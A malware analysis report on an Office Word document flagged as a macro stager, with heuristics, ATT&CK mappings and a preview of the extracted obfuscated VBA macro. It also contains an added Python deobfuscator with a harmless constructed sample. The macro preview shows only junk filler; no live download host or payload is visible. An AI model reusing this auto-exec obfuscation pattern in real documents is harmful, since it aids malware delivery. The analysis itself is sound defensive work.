Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a8778a466c66a4a…

MALICIOUS

Office (OLE)

Size: 169.5 KB
Created: 2018-04-09 07:32:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: c7a5ce4e45590b83e8de9d1319e19c8c
SHA-1: 74fcf857af46aa07663574e67f5bf9549ca09153
SHA-256: 6a8778a466c66a4a6df07163459bbe5cb4971109a3a4057330bc7c07014f7462
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Microsoft Office Word document carrying an obfuscated VBA macro that runs from the Document_Open auto-execution event. Heuristics flag a Shell() call and an obfuscated auto-exec loader (strings rebuilt at runtime and handed to a COM-instantiation or execution sink), a shape consistent with a stager that downloads and executes a second-stage payload. The extracted source preview shows only filler: loops of StrReverse/Replace assignments whose results are never used, and If-blocks guarded by constant comparisons that can never be true; the actual sink is not visible in the preview. The only URLs recovered from the document body are XMP/RDF/DrawingML schema namespaces from embedded image metadata, not download locations. ClamAV detects the file as Doc.Malware.Chronos-6897935-0.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All eight are schema namespace identifiers (Adobe XMP, W3C RDF, Dublin Core, OOXML DrawingML) carried in embedded image metadata; none of them is a download location, so they do not indicate the second-stage source.
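The loader shape described under OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER, and the junk visible in the extracted source (StrReverse/Replace results that are discarded, If-blocks guarded by constant comparisons that can never be true), can be undone statically. The Python below is an added example, not part of this report and not code from oletools: it folds StrReverse/Replace over literal arguments to a fixed point, drops If-blocks whose constant test is false, inlines variables assigned a string literal exactly once, and reports auto-exec entry points and execution sinks. The SAMPLE macro is constructed for the demonstration and is not taken from the analysed document.

```python
# Added example, not from the report or from oletools: statically fold the
# obfuscation seen in the extracted macro so the strings reaching the sink read.
import ast
import re

AUTOEXEC = ("Document_Open", "AutoOpen", "Auto_Open", "Workbook_Open", "AutoExec")
STR_LIT = r'"((?:[^"]|"")*)"'  # VBA string literal; an embedded quote is written ""
REV_RE = re.compile(r"StrReverse\(\s*" + STR_LIT + r"\s*\)", re.I)
REPL_RE = re.compile(r"Replace\(\s*" + STR_LIT + r"\s*,\s*" + STR_LIT + r"\s*,\s*" + STR_LIT + r"\s*\)", re.I)
IF_CONST_RE = re.compile(r"^\s*If\s+(.+?)\s*=\s*(.+?)\s+Then\s*$", re.I)
ARITH_RE = re.compile(r"^[\d\s+\-*()]+$")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*" + STR_LIT + r"\s*$")
SINK_RE = re.compile(r"\b(Shell|CreateObject|GetObject)\s*\(|\.(Run|Exec)\b", re.I)

# Constructed macro in the shape of the extracted one; not taken from the analysed document.
SAMPLE = """Private Sub Document_Open()
    For i = 0 To 43
        junk = StrReverse("AhQYazmKTMAmYIlgB")
        If 2460080 = 251 - 1030 Then
            junk = Replace("yLpJOkMkJuDioloOyR", "yLp", "UBdQ")
        End If
    Next i
    progid = StrReverse("llehS.tpircSW")
    cmdline = Replace("cmXXd.exe /c echXXo hello", "XX", "")
    Set sh = CreateObject(progid)
    sh.Run cmdline, 0
End Sub
"""

def _unq(s): return s.replace('""', '"')
def _q(s): return '"' + s.replace('"', '""') + '"'

def fold_strings(line):
    # Fold StrReverse/Replace over literals until nothing changes, so nested calls collapse too
    prev = None
    while prev != line:
        prev = line
        line = REV_RE.sub(lambda m: _q(_unq(m.group(1))[::-1]), line)
        line = REPL_RE.sub(lambda m: _q(_unq(m.group(1)).replace(_unq(m.group(2)), _unq(m.group(3)))), line)
    return line

def _const_int(expr):
    # Digits and + - * only, evaluated over the ast rather than eval(); None if not a constant
    if not ARITH_RE.match(expr):
        return None
    ops = {ast.Add: int.__add__, ast.Sub: int.__sub__, ast.Mult: int.__mul__}
    def ev(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, int): return n.value
        if isinstance(n, ast.UnaryOp) and isinstance(n.op, ast.USub): return -ev(n.operand)
        if isinstance(n, ast.BinOp) and type(n.op) in ops: return ops[type(n.op)](ev(n.left), ev(n.right))
        raise ValueError(expr)
    try:
        return ev(ast.parse(expr.strip(), mode="eval").body)
    except (ValueError, SyntaxError):
        return None

def strip_dead_branches(lines):
    # Drop `If <const> = <const> Then ... End If` blocks whose test is statically false
    out, depth = [], 0
    for line in lines:
        if depth:  # inside a dead block: track nesting, emit nothing
            if re.match(r"^\s*End If\s*$", line, re.I): depth -= 1
            elif re.match(r"^\s*If\b.*\bThen\s*$", line, re.I): depth += 1
            continue
        m = IF_CONST_RE.match(line)
        if m:
            lhs, rhs = _const_int(m.group(1)), _const_int(m.group(2))
            if lhs is not None and rhs is not None and lhs != rhs:
                depth = 1
                continue
        out.append(line)
    return out

def propagate_literals(lines):
    # Inline variables assigned a string literal exactly once, touching code outside literals only
    vals = {}
    for l in lines:
        m = ASSIGN_RE.match(l)
        if m:
            vals[m.group(1)] = None if m.group(1) in vals else '"' + m.group(2) + '"'
    single = {v: lit for v, lit in vals.items() if lit}
    out = []
    for l in lines:
        m = ASSIGN_RE.match(l)
        if not (m and m.group(1) in single):
            parts = l.split('"')  # even indexes are code, odd indexes are literal contents
            for i in range(0, len(parts), 2):
                for v, lit in single.items():
                    parts[i] = re.sub(r"(?<![\w.])" + re.escape(v) + r"(?![\w(])", lambda _m, lit=lit: lit, parts[i])
            l = '"'.join(parts)
        out.append(fold_strings(l))
    return out

def analyze(vba):
    # Auto-exec entry points, lines dropped as dead, sink calls and literals after folding
    lines = strip_dead_branches(vba.splitlines())
    folded = propagate_literals([fold_strings(l) for l in lines])
    return {
        "autoexec": [n for n in AUTOEXEC if re.search(r"\bSub\s+" + n + r"\b", vba, re.I)],
        "removed_lines": len(vba.splitlines()) - len(lines),
        "sinks": [l.strip() for l in folded if SINK_RE.search(l)],
        "strings": sorted({_unq(s) for l in folded for s in re.findall(STR_LIT, l)}),
        "source": "\n".join(folded),
    }
```

analyze(SAMPLE) reports Document_Open as the entry point, three lines removed as dead, and the two sinks with their arguments resolved to "WScript.Shell" and "cmd.exe /c echo hello". Folding only applies to literal arguments, so decoders built on numeric char-arrays or hex strings need their own folding rule; and when OLE_VBA_PCODE_AUTOEXEC_EXEC fires because source extraction failed, the source is not available to fold at all and the compiled p-code has to be disassembled instead.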

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 38346 bytes
SHA-256: 8b86a6bdea471886e6d9c261f2a80164006635f6a2f100bac9590600f7c2ba0c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fkelbskfbse() As Integer
    fljkeb = "328198"
    fbebl = 3113 - 434
    fkelbskfbse = fbebl - 100
End Function
Private Sub Document_Open()
    fbjlz = fkelbskfbse()
    For WCAiQ = 0 To 43
        wAHD = StrReverse("AhQYazmKTMAmYIlgB")
        wAHD = StrReverse("UfjdrVWkKpx")
        wAHD = StrReverse("kSCJKPTUIOEyh")
        wAHD = Replace("eETiUOrfLyL", "eET", "WsVo")
        wAHD = StrReverse("fsOLEgKzmpzMUVUxscE")
                If 2460080 = 251 - 1030 Then
            WZQFk = Replace("yLpJOkMkJuDioloOyR", "yLp", "UBdQ")
            WZQFk = StrReverse("yLpJOkMkJuDioloOyR")
            End If
        wAHD = StrReverse("ajovTqhBwihlT")
        wAHD = StrReverse("HHATwKBzGpXvJk")
        wAHD = StrReverse("iVniFinWKjgizXfl")
        wAHD = Replace("fAEIaQdhLYkpHnauo", "fAE", "hIuQ")
        wAHD = StrReverse("JeXHjuyaoDgZnwXZPg")
                If 914079 = 123 - 5968 Then
            gGHdv = Replace("DoltaeVorYyRq", "Dol", "oAdvb")
            gGHdv = StrReverse("DoltaeVorYyRq")
            rKfOt = Replace("wklGwScLbh", "wkl", "rXckatj")
            rKfOt = StrReverse("wklGwScLbh")
            End If
        wAHD = Replace("GRCyPUfbll", "GRC", "mpDEORX")
        wAHD = Replace("BpqHYpYOQuTxsrE", "Bpq", "lOXMB")
        wAHD = Replace("fYEfRPhzBcYE", "fYEf", "LtuGLDp")
        wAHD = StrReverse("hMhglFXgXLZoAAABF")
        wAHD = Replace("CwxoSETPfHo", "Cwxo", "dOpCkJ")
        wAHD = StrReverse("ZRaVPcAiwhm")
        wAHD = Replace("iLJngfexTayQTGLOloV", "iLJn", "QcdPTz")
                If 617267 = 101 - 7641 Then
            VsTQR = Replace("JSMfotHPmyPDIwUS", "JSM", "EkJoVfV")
            VsTQR = StrReverse("JSMfotHPmyPDIwUS")
            End If
        wAHD = Replace("fcyLqpennbdgRxcHufF", "fcyL", "xUrlR")
        wAHD = StrReverse("UyqriZSgGhaitQ")
        wAHD = Replace("ekJvQPBXLGw", "ekJv", "BKejq")
                If 991289 = 53 - 2878 Then
            xgaUw = Replace("dKaoXSTwLtl", "dKao", "OGcUo")
            xgaUw = StrReverse("dKaoXSTwLtl")
            End If
        wAHD = StrReverse("somGOJzXdbUeGDIgrEY")
    Next WCAiQ
    If 1659259 = 41 - 3507 Then
        MAxcw = Replace("BUzotIEcbHv", "BUz", "yAFOUfO")
        MAxcw = StrReverse("BUzotIEcbHv")
        afdAl = Replace("xoXgQQHHgXohL", "xoXg", "aCMK")
        afdAl = StrReverse("xoXgQQHHgXohL")
        End If
qzozUa = StrReverse("sGnDcfwsqwa")
    If 2929590 = 135 - 4290 Then
        CObTT = Replace("uijpvcMQsZHTh", "uijp", "ZFiLk")
        CObTT = StrReverse("uijpvcMQsZHTh")
        End If
    For nGlQZ = 0 To 182
                If 525399 = 51 - 5529 Then
            bOrQe = Replace("dWEPHfiMTK", "dWE", "Hptmm")
            bOrQe = StrReverse("dWEPHfiMTK")
            pwrxZ = Replace("yXXTCgOBHPuneEAEdhW", "yXXT", "qCtWPq")
            pwrxZ = StrReverse("yXXTCgOBHPuneEAEdhW")
            End If
        Egas = StrReverse("WruLHlQERCDGayY")
        Egas = StrReverse("OXjsXmWDDreuIFJacAK")
        Egas = StrReverse("YrpCihKhVEvVb")
        Egas = Replace("fnFGTulUXGCUDb", "fnF", "qGPXR")
                If 1023309 = 164 - 4472 Then
            QXYzO = Replace("OFoyXyODkpfJxRbMQ", "OFoy", "wFXMfIk")
            QXYzO = StrReverse("OFoyXyODkpfJxRbMQ")
            End If
        Egas = StrReverse("lWALjdrxRErlA")
        Egas = StrReverse("clHckpiKsISvunkoKUG")
        Egas = StrReverse("CLRGskVgPJbHDiG")
        Egas = Replace("qVksszdQke", "qVks", "pnrT")
        Egas = Replace("pAnTkifLfSiHbTXtHZ", "pAnT", "WslHhdK")
                If 30307 = 5 - 165 Then
            nDtRK = Replace("HBKDEVkOyXkqs", "HBK", "Jrcji")
            nDtRK = StrReverse("HBKDEVkOyXkqs")
            End If
        Egas = StrReverse("EQpqyCnoIO")
        Egas = StrReverse("hUHEgLOzlKPqMv")
    
... (truncated)